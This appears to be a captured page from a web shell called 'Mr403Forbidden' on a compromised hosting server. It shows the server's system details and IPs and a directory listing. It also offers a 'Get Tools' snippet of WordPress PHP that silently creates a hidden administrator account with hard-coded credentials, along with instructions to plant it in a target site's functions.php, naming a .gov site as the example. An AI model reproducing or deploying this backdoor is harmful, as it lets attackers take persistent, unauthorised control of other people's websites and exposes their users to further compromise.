./Mr403Forbidden

:/opt/cloudlinux/venv/lib/python3.11/site-packages/pycparser/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
__pycache__ dir 2026-02-06 0:25 - root/root s---------
ply dir 2026-02-06 0:25 - root/root s---------
__init__.py file 2026-01-20 13:01 2.75 KB root/root s---------
_ast_gen.py file 2026-01-20 13:01 10.31 KB root/root s---------
_build_tables.py file 2026-01-20 13:01 1.01 KB root/root s---------
_c_ast.cfg file 2026-01-20 13:01 4.16 KB root/root s---------
ast_transforms.py file 2026-01-20 13:01 5.56 KB root/root s---------
c_ast.py file 2026-01-20 13:01 30.71 KB root/root s---------
c_generator.py file 2026-01-20 13:01 17.36 KB root/root s---------
c_lexer.py file 2026-01-20 13:01 16.76 KB root/root s---------
c_parser.py file 2026-01-20 13:01 71.95 KB root/root s---------
lextab.py file 2026-01-20 13:01 8.3 KB root/root s---------
plyparser.py file 2026-01-20 13:01 4.76 KB root/root s---------
yacctab.py file 2026-01-20 13:01 200.83 KB root/root s---------

© ./Mr403Forbidden